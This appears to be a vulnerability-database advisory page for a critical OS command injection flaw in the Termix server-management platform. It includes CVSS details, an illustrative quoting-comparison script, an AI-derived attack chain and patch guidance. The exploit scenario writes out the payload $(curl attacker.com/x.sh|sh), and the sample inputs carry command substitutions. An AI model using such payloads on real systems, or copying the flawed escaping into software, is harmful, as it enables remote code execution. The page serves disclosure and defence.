
Termix EUVD-2026-34873

CVE-2026-45744 · CRITICAL
OS Command Injection (CWE-78)
2026-06-05 · GitHub_M
9.9 · CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Patch available: Jun 05, 2026 - 20:02 (EUVD)
Source Code Evidence Fetched: Jun 05, 2026 - 18:35 (vuln.today)
Analysis Generated: Jun 05, 2026 - 18:35 (vuln.today)

Description (GitHub Advisory)

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command construction, which does not prevent $(...) and backtick command substitution. Any authenticated user with an active File Manager SSH session can execute arbitrary commands on the connected remote host. Version 2.3.2 patches the issue.
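
The quoting failure described above, as an added example that is not Termix code or code from the advisory. The `realpath --` command line, the function names and the sample paths are assumptions made for illustration; the scanner lists which command substitutions a POSIX shell would still perform under each quoting style.

```javascript
// Added example: hypothetical reconstruction, not Termix source code.
// Assumption: the endpoint builds a command line such as `realpath -- <path>`.

// Flawed pattern from the advisory: escape only what ends a double-quoted
// string. The shell still expands $(...) and backticks inside "...".
function quoteDouble(value) {
  return '"' + value.replace(/(["\\])/g, "\\$1") + '"';
}
// POSIX single quotes suppress all expansion. Only ' itself needs handling:
// close the quote, emit an escaped ', reopen the quote.
function quoteSingle(value) {
  return "'" + value.replace(/'/g, "'\\''") + "'";
}
function buildCommand(quote, path) {
  return "realpath -- " + quote(path);
}
// Minimal POSIX quote-state scanner: lists the command substitutions a shell
// would still perform in commandLine. $(( arithmetic is reported as "$()" too.
function liveSubstitutions(commandLine) {
  const found = [];
  let state = "plain"; // plain | single | double
  let inBacktick = false;
  for (let i = 0; i < commandLine.length; i++) {
    const c = commandLine[i];
    if (state === "single") {
      if (c === "'") state = "plain";
    } else if (c === "\\") {
      i++; // the next character is escaped, skip it
    } else if (c === "'" && state === "plain") {
      state = "single";
    } else if (c === '"') {
      state = state === "double" ? "plain" : "double";
    } else if (c === "`") {
      if (!inBacktick) found.push({ index: i, kind: "backtick", context: state });
      inBacktick = !inBacktick;
    } else if (c === "$" && commandLine[i + 1] === "(") {
      found.push({ index: i, kind: "$()", context: state });
    }
  }
  return found;
}
// Constructed sample inputs; `id` stands in as a harmless marker command.
const SAMPLES = ["/var/log/app", "/srv/$(id)/x", "/tmp/`id`", "/home/o'brien/$(id)"];
function compareQuoting(paths) {
  return paths.map((p) => ({
    path: p,
    doubleQuoted: liveSubstitutions(buildCommand(quoteDouble, p)).length,
    singleQuoted: liveSubstitutions(buildCommand(quoteSingle, p)).length,
  }));
}
```

A command sent over an SSH exec channel is interpreted by the remote user's shell, so the quoting has to be correct for that shell. The scanner can also be used as a unit-test check on any helper that builds such command lines.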

Analysis (AI)

Remote command execution in Termix web-based server management platform (versions prior to 2.3.2) allows any authenticated user with an active File Manager SSH session to execute arbitrary OS commands on the connected remote host via the GET /ssh/file_manager/ssh/resolvePath endpoint. The vulnerability stems from improper shell escaping that fails to neutralize $(...) and backtick command substitution, yielding a CVSS 9.9 critical rating with scope change. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Acquire low-privilege Termix credentials
Delivery: Authenticate to Termix web UI
Exploit: Open File Manager SSH session to target host
Install: Send crafted GET to /ssh/file_manager/ssh/resolvePath with $(...) payload
C2: Shell substitutes attacker command in resolvePath call
Execute: Arbitrary commands execute on remote SSH host
Impact: Establish persistence and pivot

Vulnerability Assessment (AI)

Exploitation: The attacker must (1) hold valid Termix authentication credentials at any privilege level (PR:L), (2) have an active File Manager SSH session already established to a target remote host, and (3) be able to reach the Termix web interface over the network (AV:N). …

Risk Assessment: Real-world risk is high but contextualized by the PR:L (low-privilege authenticated) requirement and the need for an already-established File Manager SSH session - meaning an attacker must already hold valid Termix credentials and have configured an SSH target. …

Exploit Scenario: An attacker obtains low-privilege Termix credentials (via phishing, credential stuffing, or as a legitimate but malicious internal user), logs into the Termix web UI, opens a File Manager session to any SSH host they are permitted to access, and issues a crafted GET request to /ssh/file_manager/ssh/resolvePath with a path parameter containing $(curl attacker.com/x.sh|sh) or backtick-wrapped commands. The injected payload executes on the remote SSH host under the SSH session user's privileges, allowing the attacker to deploy implants, exfiltrate data, or pivot deeper into the network. …

Remediation: Vendor-released patch: upgrade to Termix 2.3.2 or later, available at https://github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tag with builds for Windows, Linux, and macOS. …

Recommended Action (AI)

Within 24 hours: Audit all Termix deployments to identify systems running versions prior to 2.3.2; document all user accounts holding SSH File Manager access and assess criticality of managed infrastructure. …


More in Termix

CVE-2025-59951 CRITICAL POC
9.1 Oct 01

Docker default credentials in Termix server management. PoC and patch available.

CVE-2026-22804 HIGH POC
8.0 Jan 12

Stored XSS in Termix File Manager (versions 1.7.0-1.9.0) allows attackers with SSH server access to execute arbitrary Ja

CVE-2026-45748 CRITICAL
9.8 Jun 05

OS command injection in Termix web-based server management platform prior to version 2.3.2 allows remote unauthenticated

CVE-2026-45746 CRITICAL
9.0 Jun 05

Cross-tenant remote code execution in Termix (web-based SSH/file management platform) prior to version 2.3.2 allows an a

CVE-2026-45750 CRITICAL
9.0 Jun 05

Command injection in Termix server management platform before version 2.3.2 allows authenticated users to execute arbitr

CVE-2026-42453 HIGH
8.7 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45749 HIGH
8.1 Jun 05

Authentication bypass of MFA in Termix versions prior to 2.3.2 allows an attacker who already holds a victim's account p

CVE-2026-45743 HIGH
8.1 Jun 05

Cross-tenant SSH session hijacking in Termix versions prior to 2.3.2 allows any authenticated user to fully control anot

CVE-2026-42452 HIGH
8.1 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45745 HIGH
8.0 Jun 05

Machine-in-the-middle interception of HTTPS traffic in Termix Desktop (Electron) starting at version 1.7.0 allows attack
